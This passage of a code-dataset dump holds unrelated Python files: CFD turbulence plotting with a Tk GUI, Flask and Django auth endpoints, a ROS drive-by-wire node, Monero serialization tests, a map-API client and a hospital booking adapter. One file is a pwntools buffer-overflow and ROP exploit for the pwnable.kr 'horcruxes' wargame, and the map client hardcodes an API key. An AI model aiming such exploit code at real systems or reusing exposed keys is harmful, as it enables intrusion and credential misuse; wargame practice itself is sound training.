kinetic energy resolved ratio')\n plt.ylabel(\"$Ratio$\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n \n# ---- U5\nCmu = 0.09\n\nnu_t = Cmu*np.divide(np.multiply(temean, temean), epsmean)\n \ndudx, dudy, dudz=np.gradient(u3d,dx,y,dz)\n\ndvdx, dvdy, dvdz=np.gradient(v3d,dx,y,dz)\n\ndwdx, dwdy, dwdz=np.gradient(w3d,dx,y,dz)\n\n# Time average\n\ndudymean = np.mean(dudy, axis=(0,2))\ndvdxmean = np.mean(dvdx, axis=(0,2))\n\ntau12 = - np.multiply(nu_t, dudymean + dvdxmean)\n\ndef turbulent_shear():\n plt.figure(\"Turbulent Shear\")\n plt.plot(yplus, tau12, label='$\\\\tau_{12}$')\n plt.plot(yplus, uvmean1, label='$\\\\tau_{resolved}$')\n plt.title('Turbulent Shear Ratio')\n plt.ylabel(\"$\\\\tau$\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\ndef turbulent_shear_ratio():\n plt.figure(\"Turbulent Shear Ratio\")\n plt.plot(yplus, uvmean1/(tau12 + uvmean1), label='$\\\\frac{\\\\tau_{res}}{\\\\tau_{tot}}$')\n plt.plot(yplus, 0.8*line08, label = '0.8 limit')\n plt.plot(270*line_boundary, np.linspace(0,1, np.size(temean)), 'r-', label = 'Boundary')\n plt.title('Turbulent Shear Ratio')\n plt.ylabel(\"$\\\\tau$ Ratio\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n \n# ---- U6\nomega = eps3d/(Cmu*te3d)\nomega_mean = epsmean/(Cmu*temean)\nL_t = np.power(temean, 1.5)/epsmean\nL_t = np.sqrt(temean)/(Cmu*omega_mean)\n\nF_DES = (L_t/(0.61*dx))\n\narg1 = 2*np.divide(L_t, y)\narg2 = 500*viscos*Cmu*temean/(epsmean*np.power(y, 2))\neta = np.maximum(arg1, arg2)\nF_S = np.tanh(np.power(eta,2))\nF_DDES = (1/(0.61*dx))*np.multiply(L_t, 1 - F_S)\n\ndef boundary_interface_DES():\n plt.figure(\"DES\")\n plt.plot(yplus, F_DES, label = '$F_{DES}$')\n plt.plot(yplus, np.ones(np.size(yplus)), 'k-', label = 'boundary limit')\n plt.title('$F_{DES}$')\n plt.ylabel(\"f\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\n\ndef boundary_interface_DDES():\n plt.figure(\"DDES\")\n plt.plot(yplus, F_DDES, label = '$F_{DDES}$')\n plt.plot(yplus, np.ones(np.size(yplus)), 'k-', label = 'boundary limit')\n plt.title('$F_{DDES}$')\n plt.ylabel(\"f\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\n# ---- U7\n\nkappa = 0.41\n\nzeta = 1\n\n# 1D\n\ndumeandy = np.gradient(umean, y)\ndumeandy2 = np.gradient(dumeandy, y)\n\nL_v_K_1D = kappa * np.abs(dumeandy/dumeandy2)\n\n# 3D\n\n# u\ndudx2, dudxdy, dudxdz = np.gradient(dudx,dx,y,dz)\n\ndudydx, dudy2, dudydz = np.gradient(dudy,dx,y,dz)\n\ndudzdx, dudzdy, dudz2 = np.gradient(dudz,dx,y,dz)\n# v\ndvdx2, dvdxdy, dvdxdz = np.gradient(dvdx,dx,y,dz)\n\ndvdydx, dvdy2, dvdydz = np.gradient(dvdy,dx,y,dz)\n\ndvdzdx, dvdzdy, dvdz2 = np.gradient(dvdz,dx,y,dz)\n# w\ndwdx2, dwdxdy, dwdxdz = np.gradient(dwdx,dx,y,dz)\n\ndwdydx, dwdy2, dwdydz = np.gradient(dwdy,dx,y,dz)\n\ndwdzdx, dwdzdy, dwdz2 = np.gradient(dwdz,dx,y,dz)\n\n# L calc.\n\ns11=dudx\ns12=0.5*(dudy+dvdx)\ns13=0.5*(dudz+dwdx)\ns21=s12\ns22=dvdy\ns23=0.5*(dvdz+dwdy)\ns31=s13\ns32=s23\ns33=dwdz\n\nss=(2*(s11**2+s12**2+s13**2+s21**2+s22**2+s23**2+s31**2+s32**2+s33**2)**0.5)\n \ntermu=(dudx2+dudy2+dudz2)**2\ntermv=(dvdx2+dvdy2+dvdz2)**2\ntermw=(dwdx2+dwdy2+dwdz2)**2\n\nubis=(termu+termv+termw)**0.5\n\nL_v_K_3D = kappa*ss/ubis\n\n# L calc. 
alternative\n\ntermu_alt=dudx2**2+dudy2**2+2*dudxdy**2\ntermv_alt=dvdx2**2+dvdy2**2+2*dvdxdy**2\ntermw_alt=dwdx2**2+dwdy2**2+2*dwdxdy**2\n\nubis_alt=(termu_alt+termv_alt+termw_alt)**0.5\n\nL_v_K_3D_alt = kappa*ss/ubis_alt\n\n# Plot\nL_v_K_3D_mean = np.mean(L_v_K_3D , axis=(0,2))\nL_v_K_3D_mean_alt = np.mean(L_v_K_3D_alt , axis=(0,2))\n\ndef length_scale_compare():\n plt.figure(\"Comparison of Length Scales\")\n plt.plot(yplus, L_v_K_1D , label='1D')\n plt.plot(yplus, L_v_K_3D_mean , label='3D')\n plt.plot(yplus, L_v_K_3D_mean_alt , label='3D Alternative')\n plt.title('Comparison of Length Scales')\n plt.axis([0, 5200, 0, 0.85])\n plt.ylabel(\"Von Kármán Length Scale\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\n# T1\n\n# 1D\n\nL = (te3d**0.5)/(omega*Cmu**0.25)\nLmean = np.mean(L , axis=(0,2))\n\nT_1_1D = zeta*kappa*(dumeandy**2)*(Lmean/L_v_K_1D)\n# 3D\nT_1_3D = zeta*kappa*(ss**2)*(L/L_v_K_3D)\n# 3D alt\nT_1_3D_alt = zeta*kappa*(ss**2)*(L/L_v_K_3D_alt)\n\nT_1_3D_mean = np.mean(T_1_3D, axis=(0,2))\nT_1_3D_alt_mean = np.mean(T_1_3D_alt, axis=(0,2))\n\ndef time_scale_compare():\n plt.figure(\"Comparison of $T_1$ Scales\")\n plt.plot(yplus, T_1_1D , label='1D')\n plt.plot(yplus, T_1_3D_mean , label='3D')\n plt.plot(yplus, T_1_3D_alt_mean , label='3D Alternative')\n plt.title('Comparison of $T_1$')\n plt.axis([0, 5200, 0, 5000])\n plt.ylabel(\"$T_1$\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\n# ---- GUI Append\n\ndef close_fig():\n plt.close()\n \nroot = tk.Tk()\nclose_button = tk.Button(root, text='Close plot', command = close_fig)\nclose_button.grid(row=0, column=0)\n\n\n## Overview Plots\n# U2\nlabel_overview = tk.Label(text=\"U2\", background=\"grey\")\nlabel_overview.grid(row=0, column=1, sticky='nesw')\n\nbutton_mean_velocity_profile_vx = tk.Button(root, text= 'Mean velocity Profile v_1', command = plot_mean_velocity_profile_u)\nbutton_mean_velocity_profile_vx.grid(row=1, column=1, sticky='nesw')\n\nbutton_mean_velocity_profile_vz = tk.Button(root, text= 'Mean velocity Profile v_3', command = plot_mean_velocity_profile_w)\nbutton_mean_velocity_profile_vz.grid(row=2, column=1, sticky='nesw')\n\n# U3\nlabel_overview = tk.Label(text=\"U3\", background=\"grey\")\nlabel_overview.grid(row=0, column=2, sticky='nesw')\n\nbutton_uv = tk.Button(root, text= 'uv Resolved', command = uv_stress_resolved)\nbutton_uv.grid(row=1, column=2, sticky='nesw')\n\n# U4\nlabel_overview = tk.Label(text=\"U4\", background=\"grey\")\nlabel_overview.grid(row=0, column=3, sticky='nesw')\n\nbutton_te = tk.Button(root, text= 'Resolved tubulent Kinetic Energy', command = te_plot)\nbutton_te.grid(row=1, column=3, sticky='nesw')\n\nbutton_te_ratio = tk.Button(root, text= 'Tubulent Kinetic Energy resolved ratio', command = te_plot_ratio)\nbutton_te_ratio.grid(row=2, column=3, sticky='nesw')\n\n# U5\nlabel_overview = tk.Label(text=\"U5\", background=\"grey\")\nlabel_overview.grid(row=0, column=4, sticky='nesw')\n\nbutton_turbulent_shear = tk.Button(root, text= 'Turbulent Shear', command = turbulent_shear)\nbutton_turbulent_shear.grid(row=1, column=4, sticky='nesw')\n\nbutton_turbulent_shear_ratio = tk.Button(root, text= 'Turbulent Shear Ratio', command = turbulent_shear_ratio)\nbutton_turbulent_shear_ratio.grid(row=2, column=4, sticky='nesw')\n\n# U6\nlabel_overview = tk.Label(text=\"U6\", background=\"grey\")\nlabel_overview.grid(row=0, column=5, sticky='nesw')\n\nbutton_boundary_interface_DES = tk.Button(root, text= 'Boundary Interface DES', command = boundary_interface_DES)\nbutton_boundary_interface_DES.grid(row=1, 
column=5, sticky='nesw')\n\nbutton_boundary_interface_DDES = tk.Button(root, text= 'Boundary Interface DDES', command = boundary_interface_DDES)\nbutton_boundary_interface_DDES.grid(row=2, column=5, sticky='nesw')\n\n# U7\nlabel_overview = tk.Label(text=\"U7\", background=\"grey\")\nlabel_overview.grid(row=0, column=6, sticky='nesw')\n\nbutton_length_scale_compare = tk.Button(root, text= 'Length_scale_compare', command = length_scale_compare)\nbutton_length_scale_compare.grid(row=1, column=6, sticky='nesw')\n\nbutton_time_scale_compare = tk.Button(root, text= 'T_1_scale_compare', command = time_scale_compare)\nbutton_time_scale_compare.grid(row=2, column=6, sticky='nesw')\n\nroot.mainloop()\n\n","sub_path":"Assignment 2a/pl_uvw_IDD_PANS.py","file_name":"pl_uvw_IDD_PANS.py","file_ext":"py","file_size_in_byte":15915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"606516489","text":"from flask import Blueprint, jsonify, request\nfrom flask_jwt import jwt_required\n\nfrom bonuses.database import BonusTransaction, create_bonus_transaction\nfrom bonuses.utils import parse_iso8601_date\n\n\napi = Blueprint('third_party_api', __name__)\n\n\n@api.route('/bonus-transactions/', methods=['POST'])\n@jwt_required()\ndef add_user_bonus_transaction():\n created_id = create_bonus_transaction(BonusTransaction(\n id=None,\n bonus_card_id=request.json['bonus_card_id'],\n points=int(request.json['points']),\n flight_from=request.json['flight_from'],\n flight_to=request.json['flight_to'],\n flight_date=parse_iso8601_date(request.json['flight_date']),\n ))\n return jsonify({'success': True, 'id': created_id})\n","sub_path":"bonuses/api/third_party.py","file_name":"third_party.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"77848911","text":"#!/usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import Bool\nfrom dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport\nfrom geometry_msgs.msg import TwistStamped\nfrom styx_msgs.msg import Debug\nfrom twist_controller import Controller\n\n'''\nYou can build this node only after you have built (or partially built) the `waypoint_updater` node.\n\nYou will subscribe to `/twist_cmd` message which provides the proposed linear and angular velocities.\nYou can subscribe to any other message that you find important or refer to the document for list\nof messages subscribed to by the reference implementation of this node.\n\nOne thing to keep in mind while building this node and the `twist_controller` class is the status\nof `dbw_enabled`. While in the simulator, its enabled all the time, in the real car, that will\nnot be the case. This may cause your PID controller to accumulate error because the car could\ntemporarily be driven by a human instead of your controller.\n\nWe have provided two launch files with this node. 
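A client-side sketch for exercising the bonus-transactions endpoint above (host, port, and token are placeholders; flask_jwt expects the "JWT " prefix in the Authorization header by default, and the field names match what the handler reads from request.json):

import requests

resp = requests.post(
    "http://localhost:5000/bonus-transactions/",
    headers={"Authorization": "JWT <token-from-the-auth-endpoint>"},
    json={
        "bonus_card_id": 1,          # placeholder values throughout
        "points": "500",             # the handler casts this with int()
        "flight_from": "LED",
        "flight_to": "SVO",
        "flight_date": "2019-05-01", # parsed by parse_iso8601_date()
    },
)
print(resp.json())  # expected shape: {"success": true, "id": <created id>}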
Vehicle specific values (like vehicle_mass,\nwheel_base) etc should not be altered in these files.\n\nWe have also provided some reference implementations for PID controller and other utility classes.\nYou are free to use them or build your own.\n\nOnce you have the proposed throttle, brake, and steer values, publish it on the various publishers\nthat we have created in the `__init__` function.\n\n'''\n\nEPSILON_THROTTLE = 0.05\nEPSILON_BRAKE = 0.05\nEPSILON_STEER = 0.05\n\n\nclass DBWNode(object):\n test = False\n def __init__(self):\n rospy.init_node('dbw_node', log_level=rospy.DEBUG)\n\n vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)\n fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)\n brake_deadband = rospy.get_param('~brake_deadband', .1)\n decel_limit = rospy.get_param('~decel_limit', -5)\n accel_limit = rospy.get_param('~accel_limit', 1.)\n wheel_radius = rospy.get_param('~wheel_radius', 0.2413)\n wheel_base = rospy.get_param('~wheel_base', 2.8498)\n steer_ratio = rospy.get_param('~steer_ratio', 14.8)\n max_lat_accel = rospy.get_param('~max_lat_accel', 3.)\n max_steer_angle = rospy.get_param('~max_steer_angle', 8.)\n kp = rospy.get_param('~kp', 1.0)\n ki = rospy.get_param('~ki', 0.0)\n kd = rospy.get_param('~kd', 0.0)\n\n self.steer_pub = rospy.Publisher('/vehicle/steering_cmd', SteeringCmd, queue_size=1)\n self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd', ThrottleCmd, queue_size=1)\n self.brake_pub = rospy.Publisher('/vehicle/brake_cmd', BrakeCmd, queue_size=1)\n self.debug_publisher = rospy.Publisher('/debug_msg', Debug, queue_size=1)\n\n # Create `TwistController` object\n self.controller = Controller(vehicle_mass, fuel_capacity, brake_deadband, decel_limit, accel_limit,\n wheel_radius, wheel_base, steer_ratio, max_lat_accel, max_steer_angle, kp, ki, kd)\n\n # Subscribe to all the topics you need to\n rospy.Subscriber('/dbw_enabled', Bool, self.dbw_enabled_cb)\n rospy.Subscriber('/current_velocity', TwistStamped, self.current_velocity_cb)\n rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cmd_cb)\n\n # Members\n self.dbw_enabled = True # TODO: should be initialized with False! 
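The reference PID implementation mentioned above is not shown in this record; a minimal stand-in consistent with the kp/ki/kd parameters the node reads in __init__ (a sketch only, not the project's actual twist_controller):

class SimplePID(object):
    def __init__(self, kp, ki, kd):
        self.kp, self.ki, self.kd = kp, ki, kd
        self.int_val = 0.0
        self.last_error = 0.0

    def step(self, error, dt):
        # Accumulate the integral term and estimate the derivative.
        self.int_val += error * dt
        derivative = (error - self.last_error) / dt
        self.last_error = error
        return self.kp * error + self.ki * self.int_val + self.kd * derivative

    def reset(self):
        # Called when dbw is disabled so the integral term does not wind up
        # while a human is temporarily driving the car.
        self.int_val = 0.0
        self.last_error = 0.0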
currently not possible since simulator sends no dbw_enabled\n        self.current_velocity = None\n        self.twist_cmd = None\n        self.last_throttle = 0.0\n        self.last_brake = 0.0\n        self.last_steer = 0.0\n\n        self.loop()\n\n    def loop(self):\n        rate = rospy.Rate(50) # 50Hz\n        while not rospy.is_shutdown():\n            # TODO: Get predicted throttle, brake, and steering using `twist_controller`\n            # You should only publish the control commands if dbw is enabled\n            # throttle, brake, steering = self.controller.control(,\n            #                                                     ,\n            #                                                     ,\n            #                                                     ,\n            #                                                     )\n\n            # rospy.logwarn(\"dbw_enabled={}, current_velocity={}, twist_cmd={}\".format(\n            #     self.dbw_enabled, self.current_velocity != None, self.twist_cmd != None\n            # ))\n\n            if (self.dbw_enabled and self.current_velocity is not None and self.twist_cmd is not None):\n                throttle, brake, steer = self.controller.control(self.twist_cmd, self.current_velocity)\n\n                # if self.twist_cmd.twist.linear.x <= 0.0:\n                #     self.test = True\n                #\n                # if self.test and self.twist_cmd.twist.linear.x > 0.0:\n                #     rospy.logwarn(\"v_ref was 0 and is now higher\")\n                #     self.test = False\n\n                # rospy.loginfo(\"Current_v={}, twist_v={}, Throttle={}, Brake={}, Steer={}, twist_angular_z={}\".\n                #               format(self.current_velocity.twist.linear.x, self.twist_cmd.twist.linear.x,\n                #                      throttle, brake, steer, self.twist_cmd.twist.angular.z))\n\n                self.publish(throttle, brake, steer)\n\n            elif not self.dbw_enabled:\n                self.controller.reset()\n\n            # if len(self.controller.twist_values[0]) > 50:\n            #     dbg_msg = Debug()\n            #     dbg_msg.v_ref = self.controller.twist_values[0]\n            #     dbg_msg.v_cur = self.controller.twist_values[1]\n            #     dbg_msg.brake = self.controller.twist_values[2]\n            #     dbg_msg.throttle = self.controller.twist_values[3]\n            #     dbg_msg.v_err = self.controller.twist_values[4]\n            #     dbg_msg.lowpass_out = self.controller.twist_values[5]\n            #     # dbg_msg.steer = self.controller.twist_values[6]\n            #     # dbg_msg.twist_linear_x = self.controller.twist_values[7]\n            #     # dbg_msg.twist_angular_z = self.controller.twist_values[8]\n            #     self.debug_publisher.publish(dbg_msg)\n\n            rate.sleep()\n\n    def dbw_enabled_cb(self, msg):\n        # rospy.loginfo(\"Received dbw_enabled message.\")\n        self.dbw_enabled = msg.data\n        # rospy.logdebug(msg)\n\n    def current_velocity_cb(self, msg):\n        # rospy.loginfo(\"Received current_velocity message.\")\n        self.current_velocity = msg\n        # rospy.logdebug(msg)\n\n    def twist_cmd_cb(self, msg):\n        # rospy.loginfo(\"Received twist_cmd message.\")\n        self.twist_cmd = msg\n        # rospy.logdebug(msg)\n\n    def publish(self, throttle, brake, steer):\n        if abs(self.last_throttle - throttle) > EPSILON_THROTTLE:\n            self.last_throttle = throttle\n            tcmd = ThrottleCmd()\n            tcmd.enable = True\n            tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT\n            tcmd.pedal_cmd = throttle\n            self.throttle_pub.publish(tcmd)\n            rospy.loginfo(\"Issued throttle command, value={}\".format(throttle))\n        else:\n            pass\n            # rospy.loginfo(\"Did not issue throttle command, value={}, last value={}\".format(throttle, self.last_throttle))\n\n        if abs(self.last_steer - steer) > EPSILON_STEER:\n            self.last_steer = steer\n            scmd = SteeringCmd()\n            scmd.enable = True\n            scmd.steering_wheel_angle_cmd = steer\n            self.steer_pub.publish(scmd)\n            rospy.loginfo(\"Issued steer command, value={}\".format(steer))\n        else:\n            pass\n            # rospy.loginfo(\n            #     \"Did not issue steer command, value={}, last value={}\".format(steer, self.last_steer))\n\n        # keep braking while stopped (e.g. holding the brake at a red traffic light)\n        if abs(self.last_brake - brake) > EPSILON_BRAKE or self.current_velocity.twist.linear.x <= 0:\n            self.last_brake = brake\n            bcmd = BrakeCmd()\n            bcmd.enable = 
True\n # braking only works with torque...\n bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE\n bcmd.pedal_cmd = brake\n self.brake_pub.publish(bcmd)\n rospy.loginfo(\"Issued brake command, value={}\".format(brake))\n else:\n pass\n # rospy.loginfo(\n # \"Did no issue brake command, value={}, last value={}\".format(brake, self.last_brake))\n\n\nif __name__ == '__main__':\n DBWNode()\n","sub_path":"ros/src/twist_controller/dbw_node.py","file_name":"dbw_node.py","file_ext":"py","file_size_in_byte":8589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"44096197","text":"import json\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, permission_classes, authentication_classes\nfrom rest_framework.decorators import api_view\nfrom rest_framework.views import APIView\nfrom django.contrib.auth import authenticate\nfrom account.api.serializers import RegistrationSerializer\nfrom account.models import Account\nfrom rest_framework.authtoken.models import Token\n\n\n@api_view(['POST', ])\n@permission_classes([])\n@authentication_classes([])\ndef registration_view(request):\n\n if request.method == 'POST':\n data = {}\n email = request.data.get('email', '0').lower()\n if validate_email(email) != None:\n data['error_message'] = 'That email is already in use.'\n data['response'] = 'Error'\n data['error'] = True\n return Response(data)\n\n username = request.data.get('username', '0')\n if validate_username(username) != None:\n data['error_message'] = 'That username is already in use.'\n data['response'] = 'Error'\n data['error'] = True\n return Response(data)\n\n serializer = RegistrationSerializer(data=request.data)\n\n if serializer.is_valid():\n account = serializer.save()\n data['response'] = 'successfully registered new user.'\n data['email'] = account.email\n data['username'] = account.username\n data['pk'] = account.pk\n token = Token.objects.get(user=account).key\n data['token'] = token\n else:\n data = serializer.errors\n return Response(data)\n\n\ndef validate_email(email):\n account = None\n try:\n account = Account.objects.get(email=email)\n except Account.DoesNotExist:\n return None\n if account != None:\n return email\n\n\ndef validate_username(username):\n account = None\n try:\n account = Account.objects.get(username=username)\n except Account.DoesNotExist:\n return None\n if account != None:\n return username\n\n\nclass ObtainAuthTokenView(APIView):\n\n authentication_classes = []\n permission_classes = []\n\n def post(self, request):\n context = {}\n data = json.loads(request.body)\n email = data.get('username', '0')\n password = data.get('password', 0)\n account = authenticate(email=email, password=password)\n if account:\n try:\n token = Token.objects.get(user=account)\n except Token.DoesNotExist:\n token = Token.objects.create(user=account)\n context['response'] = 'Successfully authenticated.'\n context['pk'] = account.pk\n context['email'] = email.lower()\n context['username'] = account.username\n context['token'] = token.key\n else:\n context['response'] = 'Error'\n context['error_message'] = 'Invalid credentials'\n context['error'] = True\n\n return Response(context)\n","sub_path":"Backend/src/account/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"330060474","text":"#!/usr/bin/env python\n\nfrom pwn import *\nimport re, 
time\n\ncontext.update(arch=\"i386\", os=\"linux\", bits=\"32\", log_level=\"debug\")\n\n#TARGET = ELF(\"./horcruxes\")\n#server = [\"pwnable.kr\", 2222, \"horcruxes\", \"guest\"]\nserver = [\"pwnable.kr\", 9032]\n\nfunc_a = 0x0809FE4B\nfunc_b = 0x0809FE6A\nfunc_c = 0x0809FE89 \nfunc_d = 0x0809FEA8\nfunc_e = 0x0809FEC7\nfunc_f = 0x0809FEE6\nfunc_g = 0x0809FF05\n\ncall_ropme = 0x0809FFFC\n\npayload = \"\\x90\"*0x79\npayload += p32(func_a)\npayload += p32(func_b)\npayload += p32(func_c)\npayload += p32(func_d)\npayload += p32(func_e)\npayload += p32(func_f)\npayload += p32(func_g)\npayload += p32(call_ropme)\n\n#proc = process(executable=TARGET.path, argv=[TARGET.path])\n#conn = ssh(host=server[0], port=server[1], user=server[2], password=server[3])\nconn = connect(server[0], server[1])\n#proc = conn.process(executable=\"./horcruxes\", argv=[\"horcruxes\"])\nconn.sendline(\"\")\nconn.sendline(payload)\n\nprint(conn.recv(1024))\ntext = conn.recv(1024, timeout=1.0)\n\nregex = re.compile(r\"([\\w-][\\d]+)\")\nexp = regex.findall(text)\nexp_sum = 0\n\nfor v0 in range(0, 7):\n\tprint(v0)\n\texp_sum += int(exp[v0])\nprint(exp_sum)\nconn.interactive()\n","sub_path":"pwnablekr-horcruxes/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"91718884","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport random\nimport base64\nimport unittest\nimport pkg_resources\n\nimport asyncio\nimport aiounittest\n\nfrom .test_data import XmrTestData\nfrom .. import xmrserialize as x\nfrom .. import xmrtypes as xmr\n\n\n__author__ = 'dusanklinec'\n\n\nclass XmrTypesBaseTest(aiounittest.AsyncTestCase):\n    \"\"\"Simple tests\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        super(XmrTypesBaseTest, self).__init__(*args, **kwargs)\n        self.test_data = XmrTestData()\n\n    def setUp(self):\n        self.test_data.reset()\n\n    async def test_simple_msg(self):\n        \"\"\"\n        TxinGen\n        :return:\n        \"\"\"\n        msg = xmr.TxinGen(height=42)\n\n        writer = x.MemoryReaderWriter()\n        ar1 = x.Archive(writer, True)\n        await ar1.message(msg)\n\n        msg2 = xmr.TxinGen()\n        ar2 = x.Archive(x.MemoryReaderWriter(writer.buffer), False)\n        await ar2.message(msg2)\n\n        self.assertEqual(msg.height, msg2.height)\n        self.assertEqual(msg, msg2)\n\n    async def test_boro_sig(self):\n        \"\"\"\n        BoroSig\n        :return:\n        \"\"\"\n        msg = self.test_data.gen_borosig()\n\n        writer = x.MemoryReaderWriter()\n        ar1 = x.Archive(writer, True)\n        await ar1.message(msg)\n\n        msg2 = xmr.BoroSig()\n        ar2 = x.Archive(x.MemoryReaderWriter(writer.buffer), False)\n        await ar2.message(msg2)\n\n        self.assertEqual(msg, msg2)\n\n\n\n\nif __name__ == \"__main__\":\n    unittest.main()  # pragma: no cover\n\n\n\n","sub_path":"monero_serialize/tests/test_xmr_archive.py","file_name":"test_xmr_archive.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"95033479","text":"import requests\nimport json\n\nSEARCH_API_URL = 'http://restapi.amap.com/v3/place/text'\nTRANSIT_API_URL = 'http://restapi.amap.com/v3/direction/transit/integrated'\nKEY = '16e4ba25613ba61da392cacbcd6347ce'\n\n\nclass AMap(object):\n    @staticmethod\n    def search_address(address):\n        params = {\n            'key': KEY,\n            'keywords': address,\n            'city': 'shanghai'\n        }\n        amap_rsp = requests.get(SEARCH_API_URL, params=params)\n        if amap_rsp.status_code == 200:\n            return json.loads(amap_rsp.text)['pois'][0]['location'].split(',')\n        else:\n            return None\n\n    
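    # A convenience wrapper combining the two lookups in this class; a sketch
    # only -- the method name is hypothetical and is not part of the original
    # crawler. search_address() returns [lon, lat] as strings, which is
    # exactly what transit() concatenates into its query parameters.
    @staticmethod
    def transit_between_addresses(origin_addr, dest_addr):
        origin = AMap.search_address(origin_addr)
        dest = AMap.search_address(dest_addr)
        if origin is None or dest is None:
            return None
        return AMap.transit(origin[0], origin[1], dest[0], dest[1])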
@staticmethod\n    def transit(origin_lon, origin_lat, dest_lon, dest_lat):\n        params = {\n            'key': KEY,\n            'origin': origin_lon + ',' + origin_lat,\n            'destination': dest_lon + ',' + dest_lat,\n            'city': 'shanghai',\n            'strategy': 0\n        }\n\n        amap_rsp = requests.get(TRANSIT_API_URL, params=params)\n        if amap_rsp.status_code == 200:\n            rsp_json = json.loads(amap_rsp.text)\n            if rsp_json['status'] == '0':\n                return None\n            else:\n                # print(json.dumps(rsp_json, indent=4))\n                return rsp_json\n\n\nclass Location(object):\n    def __init__(self, name, *coordinate):\n        self.name = name\n        self.longitude = coordinate[0]\n        self.latitude = coordinate[1]\n\n    def __str__(self):\n        return 'name = {0}, longitude = {1}, latitude = {2}'.format(self.name, self.longitude, self.latitude)\n\n    def coordinate(self):\n        return '{0},{1}'.format(self.longitude, self.latitude)\n\n\nclass Job(object):\n    def __init__(self, job_raw, commute_cost):\n        # translation_table = dict.fromkeys(map(ord, '!@#$'), None)\n        translation_table = dict.fromkeys(map(ord, '\\'\\\"[]/'), None)\n        self.salary = job_raw['salary'].translate(translation_table)\n        self.title = job_raw['title'][0].translate(translation_table)\n        self.address = job_raw['address'].translate(translation_table)\n        self.location = Location(self.title, *job_raw['coordinate'])\n        self.cost = commute_cost\n","sub_path":"crawl/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"530063162","text":"import json\nfrom com.pajk.plazass.utils import DictUtil, RegistryDao,CancelRegistryDao, ValidateUtil, AllHttpClientWriter, RocketMQWriter, LogUtil\n\n\n# import_script 武汉大学人民医院/Abstract.py\n## Renmin Hospital of Wuhan University: query the appointment list\nclass RegistryList(Abstract):\n    def __init__(self):\n        self.__visitNoon = {\"0\": \"1\", \"1\": \"2\", \"2\": \"3\", \"3\": \"3\"} ##TODO this mapping looks wrong\n        self.__status = {\"0\":1, \"1\":2, \"2\":6, \"3\":7, \"4\":8, \"5\":8, \"6\":0, \"7\":4}\n\n    def getVisitNoon(self, noon):\n        visitNoon = self.__visitNoon.get(noon)\n        return visitNoon if visitNoon else \"\"\n\n    def getStatus(self,status):\n        _status = self.__status.get(status)\n        return _status if _status else 4\n\n\n\n    def getRequestParams(self, message):\n        ''' Build the request parameters '''\n        reqData = json.loads(message[\"content\"])\n        hospitalId = message[\"from\"]\n        result = {}\n        result[\"url\"] = DictUtil.getDictValue(hospitalId, \"serviceUrl\") + \"personalappointlist\"\n\n\n        params = {}\n        params[\"IDNumberType\"] = reqData.get(\"patientIdcardtype\")\n        params[\"IDNumber\"] = reqData.get(\"patientIdcard\")\n        params[\"Status\"] = reqData.get(\"Status\")\n        params[\"StartDate\"] = reqData.get(\"StartDate\")\n        params[\"EndDate\"] = reqData.get(\"EndDate\")\n\n        params[\"HospitalId\"] = DictUtil.getDictValue(hospitalId, \"channelHospId\")\n        self.setCommonParams5(hospitalId, params)\n\n        result[\"params\"] = params\n        message[\"content\"] = result\n        return message\n\n    def getResponseParams(self, messageObj):\n        content = messageObj[\"content\"]\n        contentObj = json.loads(content)\n        ReturnCode = int(contentObj[\"ReturnCode\"])\n\n        if ReturnCode != 0:\n            # specify the next engine message type\n            messageObj[\"msgType\"] = \"EXIT\"\n            messageObj[\"returnCode\"] = \"ThirdError\"\n            messageObj[\"returnMsg\"] = contentObj[\"Message\"]\n            return messageObj\n\n        data = self.setRegistryList(contentObj, messageObj[\"from\"])\n        messageObj[\"content\"] = data\n        messageObj[\"contentType\"] = \"JSON\"\n        return messageObj\n\n    def setRegistryList(self, contentObj, hospitalId):\n        jDatas = 
